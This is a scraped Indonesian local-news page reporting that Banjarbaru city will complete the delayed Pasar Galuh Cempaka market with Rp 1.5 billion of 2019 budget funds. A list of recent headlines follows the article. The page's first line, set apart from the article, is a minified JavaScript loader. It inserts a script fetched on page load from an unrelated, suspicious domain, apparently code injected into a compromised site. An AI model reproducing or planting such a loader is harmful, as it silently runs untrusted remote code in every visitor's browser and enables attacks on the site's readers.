(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Sempat Terganjal Administrasi, Pasar Galuh Cempaka Ditarget Beroperasional Akhir 2019


BANJARBARU, Hampir dua tahun belum ada kejelasan terkait pembangunan Pasar Galuh Cempaka, di Kecamatan Cempaka, Kota Banjarbaru, akhirnya, Pemko Banjarbaru memastikan akan menyelesaikan pembangunan pasar rakyat yang dibangun dari dana Kementrian Perdagangan RI tersebut.

Sekda Kota Banjarbaru, H Said Abdullah mengakuai, awalnya pengerjaan pembangunan Pasar Galuh Cempaka sempat berhenti, lantaran persoalan administrasi termasuk penyerahan aset hibah dari Kementerian Perdagangan RI kepada Pemko Banjarbaru.

“Sebenarnya memang ada permasalahan administrasi, termasuk saat proses lelang. Dampaknya, terjadi keterlambatan proses penyelesaian pembangunan pasar Cempaka itu. Banyak waktu yang terbuang,” kata Sekda.

Sekdako Banjarbaru menuturkan, pengerjaan finishing pasar segera dilakukan. Jika sesuai rencana, maka Pasar Galuh Cempaka akan bisa dioperasionalkan pada Desember 2019 atau awal Januari 2020 nanti.

“Saat ini permasalahan administrasi sudah selesai. Sudah ada keputusan Pengadilan kepada Pemko Banjarbaru yang menjelaskan bisa untuk membayarkan pekerjaan yang dikerjakan oleh kontraktor sebelumnya,” terangnya.

Rencananya, pengerjaan Pasar Galuh Cempaka ini dapat diselesaikan dalam waktu 40 hari yang mana menggunakan APBD 2019 Pemkot Banjarbaru sebesar Rp 1,5 miliar. Termasuk untuk sarana pendukung bangunan pasar sesuai ketentuan prototype Kementerian Perdagangan RI.

Adapun rincian dana tersebut adalah untuk pembuatan los pedangan sekitar Rp 900 juta, pemasangan paving sekitar Rp 400 juta dan pemasangan besi sekitar Rp 100 juta. Setelah itu clear semua pengerjaannya.

Sementara itu, Kepala Bidang Pengelolaan Pasar Disperindag Banjarbary, Wahyudillah mengatakan telah memulai proses pendataan para pedagang. Dinas Perdagangan akan memilah para pedangan sesuai dengan zonasi, sehingga nanti banyak pedagang yang tertampung. Mulai dari pedagang sembako, sayur, daging, sampai dengan pedagang ikan basah.

Ditambahkan Wahyudillah, kepala dinas akan menghadiri penandatanganan berita acara serah terima dan naskah hibah barang milik Negara yang akan digelar pada 12 hingga 14 September 2019 di el Hotel Royale, Bandung, Jawa Barat.

“Ada 140 daerah di Indonesia yang akan menghadiri acara serah terima itu. Termasuk Dinas Perdagangan Kota Banjarbaru,” kata Wahyudillah. (rico)

Reporter : Rico
Editor : Bie


Desy Arfianty

Recent Posts

Begini Penjelasan Disporabudpar Banjarbaru Soal Perizinan Hotel Aeris

KANALKALIMANTAN.COM, BANJARBARU – Sebuah hotel baru di ruas Jalan Panglima Batur Banjarbaru akan melakukan soft… Read More

10 jam ago

Gerilya Politik Lisa Halaby ke Nasdem Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Langkah politik Erna Lisa Halaby mencari partai politik pengusung dalam Pemilihan Wali… Read More

10 jam ago

Tim Wasev Cek Langsung Lokasi TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana bersama Tim Pengawas… Read More

11 jam ago

Lutung Tersengat Listrik Dievakuasi Warga, Damkar HSU Amankan Satwa Dilindungi

KANALKALIMANTAN.COM, AMUNTAI - Tersengat aliran listrik bertegangan tinggi, seekor satwa dilindungi lutung terkapar berhasil dievakuasi… Read More

11 jam ago

“Pesta Siswa Literasi Digital” di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Teknologi yang saat ini berkembang sangat pesat dan cepat telah membuat perubahan… Read More

12 jam ago

Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

Lisa Halaby: Saya Siap, Insyaallah Mundur Sebagai ASN Read More

12 jam ago

This website uses cookies.